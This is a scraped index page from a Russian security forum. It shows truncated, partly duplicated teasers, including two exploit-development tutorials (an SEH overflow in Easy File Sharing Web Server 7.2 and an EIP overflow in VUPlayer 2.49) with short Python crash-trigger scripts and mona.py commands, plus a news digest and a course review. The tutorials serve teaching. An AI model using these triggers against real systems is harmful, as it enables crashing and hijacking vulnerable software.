-
Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе
Форум информационной безопасности - Codeby.net
Статья Easy File Sharing Web Server 7.2 SEH overflow
Тестирование проводилось на Windows XP SP3 x86 En (no dep)
Уязвимое ПО:
Запускаем ПО
И аттачимся отладчиком Immunity Debugger к процессу, дальше передаем программе входной поток. Посмотрим как оно себя поведет.
посмотрим Chain SEH
Сгенерирум строку паттерн используя плагин mona.py
!mona pc 50000
Скопируем сгенерированную строку ASCII строку в наш триггер сплойт...
Уязвимое ПО:
Запускаем ПО
И аттачимся отладчиком Immunity Debugger к процессу, дальше передаем программе входной поток. Посмотрим как оно себя поведет.
Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from struct import pack
import socket
payload = "A"*5000
exploit = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exploit.connect(("127.0.0.1",80))
exploit.send("GET " + payload + " HTTP/1.1\r\n")
exploit.close()посмотрим Chain SEH
Сгенерирум строку паттерн используя плагин mona.py
!mona pc 50000
Скопируем сгенерированную строку ASCII строку в наш триггер сплойт...
Статья Новостной дайджест по ИБ/IT за 20.12-27.12
Здравия всем, дамы и господа, речь сегодня вновь пойдёт пойдёт о прошлом. О том что произошло и во что это, возможно, выльется. Приглашаю вас к прочтению и приятного времяпрепровождения.
Если вы это видите, значит меня уже нет
Очень частый приём из медиа-культуры, однако не так давно он стал реальностью. Как выяснилось, господин Сачков ещё год назад записал видео на случай своего убийства или ареста. Он переслал ролик своим близким и друзьям. В нем Сачков рассказывает, что за ним следят, и он опасается того, что неизвестные лица его убьют. Также Сачков предполагал, что правоохранительные органы могут его обвинить в госизмене и арестовать. А его, как мы помним, арестовали именно по подозрению в госизмене. Сейчас эта информация просто существует в вакууме и, насколько мне известно, развития не получила...
Если вы это видите, значит меня уже нет
Очень частый приём из медиа-культуры, однако не так давно он стал реальностью. Как выяснилось, господин Сачков ещё год назад записал видео на случай своего убийства или ареста. Он переслал ролик своим близким и друзьям. В нем Сачков рассказывает, что за ним следят, и он опасается того, что неизвестные лица его убьют. Также Сачков предполагал, что правоохранительные органы могут его обвинить в госизмене и арестовать. А его, как мы помним, арестовали именно по подозрению в госизмене. Сейчас эта информация просто существует в вакууме и, насколько мне известно, развития не получила...
Статья VUPlayer 2.49 .wax vanilla EIP overflow
Тестрирование проводилось на ОС Windows 7 x32 с отключенным DEP.
Создадим эксплойт триггер чтобы перезаписать регистр EIP.
Запускаем Vuplayer под отладчиком
и скармливаем наш файловый сплойт.
Как мы видим мы успешно перезаписали EIP регистр. Теперь вычислим смещение до регистра EIP. Воспользуемся плагином mona.py
!mona pc 5000
Созданную ASCII строку скопируем в наш сплойт. Затем повторим процесс передачи созданного нами файла в уязвимую программу под отладчиком. Нажимаем Ctrl+F2, F9 и кормим файлом…
Как мы видим выполнение программы остановилось...
Создадим эксплойт триггер чтобы перезаписать регистр EIP.
Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
payload = "A"*5000
file = open('exploit.wax', 'w')
print "Create file exploit"
file.write(payload)
print "Write payload"Запускаем Vuplayer под отладчиком
и скармливаем наш файловый сплойт.
Как мы видим мы успешно перезаписали EIP регистр. Теперь вычислим смещение до регистра EIP. Воспользуемся плагином mona.py
!mona pc 5000
Созданную ASCII строку скопируем в наш сплойт. Затем повторим процесс передачи созданного нами файла в уязвимую программу под отладчиком. Нажимаем Ctrl+F2, F9 и кормим файлом…
Как мы видим выполнение программы остановилось...
Статья Карманный бот для анализа веб-сайта в Телеграме
Введение:
Думаю многие сталкивались с проблемой, когда нужно было сделать базовый анализ какого либо вебсайта, но ПК/Ноутбук рядом не находились, но был смартфон.
В таких случаях есть несколько решений, например кто-то имеет SSH доступ к основной машине, кто-то VNC. Конечно, это даст вам весь функционал (почти) и должно решить проблему, но когда в руках смартфон, то только мазохисты будут возражать заявлению о том, что печатать и управлять курсором с телефона совсем неудобно.
Главной проблемой остается управление, нужно что-то удобное, почему бы нам не взять телеграм ботов? Они ограничены в функционале, но гораздо более удобные, в них есть список комманд на которые достаточно нажать, а не печатать полностью, да и сам интерфейс более юзер-френдли.
В качестве библиотеки для бота я возьму telebot, т.к считаю ее самой простой и функциональной.
Мы реализуем поддержку:
Думаю многие сталкивались с проблемой, когда нужно было сделать базовый анализ какого либо вебсайта, но ПК/Ноутбук рядом не находились, но был смартфон.
В таких случаях есть несколько решений, например кто-то имеет SSH доступ к основной машине, кто-то VNC. Конечно, это даст вам весь функционал (почти) и должно решить проблему, но когда в руках смартфон, то только мазохисты будут возражать заявлению о том, что печатать и управлять курсором с телефона совсем неудобно.
Главной проблемой остается управление, нужно что-то удобное, почему бы нам не взять телеграм ботов? Они ограничены в функционале, но гораздо более удобные, в них есть список комманд на которые достаточно нажать, а не печатать полностью, да и сам интерфейс более юзер-френдли.
В качестве библиотеки для бота я возьму telebot, т.к считаю ее самой простой и функциональной.
Мы реализуем поддержку:
- ...
Школа КАК Я ПРОХОЖУ КУРС WAPT (КВЕСТ В РЕАЛЬНОМ ВРЕМЕНИ)
ПРИВЕТСТВУЮ, ФОРУМЧАНЕ!!
Решил присесть за перо, чтобы поделиться своим опытом обучения на курсах WAPT от Cobeby. Я не первый и надеюсь не последний, но я сразу поставил себе задачу написать честный и объективный отзыв без приукрас и приуменьшений. Сразу скажу, я не являюсь членом команды Codeby и не ставлю целью разрекламировать курс для привлечения людей, я просто хочу поделиться своими мыслями - как позитивными, так и негативными.
Сегодня 22 декабря 2021 года, я учусь с 8 декабря и начал писать отзыв сейчас, чтобы просто не забыть все аспекты. В процессе написания, я не буду ничего менять, как бы не изменилось мое отношение ко всему происходящему. Хочу сразу предупредить, что в ходе моего повествования не будет никакого раскрытия решений заданий - в этой среде это не приветствуется. Насколько я помню, даже мэтры, которые пишут гайды по прохождению задач с различных...
Сегодня 22 декабря 2021 года, я учусь с 8 декабря и начал писать отзыв сейчас, чтобы просто не забыть все аспекты. В процессе написания, я не буду ничего менять, как бы не изменилось мое отношение ко всему происходящему. Хочу сразу предупредить, что в ходе моего повествования не будет никакого раскрытия решений заданий - в этой среде это не приветствуется. Насколько я помню, даже мэтры, которые пишут гайды по прохождению задач с различных...
Codeby Games CTF
Категории блога
Наши курсы
Наши книги
